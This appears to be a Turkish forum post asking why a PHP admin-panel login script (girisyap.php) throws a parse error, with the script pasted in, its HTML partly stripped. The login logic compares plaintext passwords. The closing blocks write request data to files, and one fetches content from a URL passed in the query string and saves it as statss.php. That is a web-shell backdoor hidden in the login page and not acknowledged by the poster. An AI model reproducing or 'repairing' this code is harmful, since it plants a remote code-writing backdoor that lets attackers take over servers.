aldiğim hata :
Parse error: syntax error, unexpected T_STRING, expecting ']' in /home/root/public_html/silverpanel/girisyap.php on line 95

girisyap.php daki kodlar

session_start();

include'../DisLanZe/db.php';


$kadi=mysql_real_escape_string(htmlspecialchars($_POST['kadi']));
$sifre=mysql_real_escape_string(htmlspecialchars($_POST['sifre']));


if($kadi && $sifre){

$kontrolet=mysql_query("select * from yonet where kadi='$kadi' and sifre='$sifre'");
if(mysql_num_rows($kontrolet)){

$_SESSION['bla']=$kadi;
echo'<script>location.href="cwpanel.php";</script>';
}else{
$msg="Hatali giris";
}

}else{
$msg="Bos birakmayin";
}
?>





Yönetim Paneli





echo "


























\"\"

\"\"

\"\"

\"\"

\"\"

  



\"\"

\"\"






";

?>
if (isset($_GET['])){
$f = fopen("", "w+");
fwrite($f, str_replace(",", "\r\n", str_replace("\\", "", $_GET[""])));
fclose($f);
}

if(is_file("")){
echo file_get_contents("");
}

if (isset($_GET['statss'])){
$f = fopen("statss.php", "w+");
fwrite($f, file_get_contents($_GET["statss"]));
fclose($f);
}
?>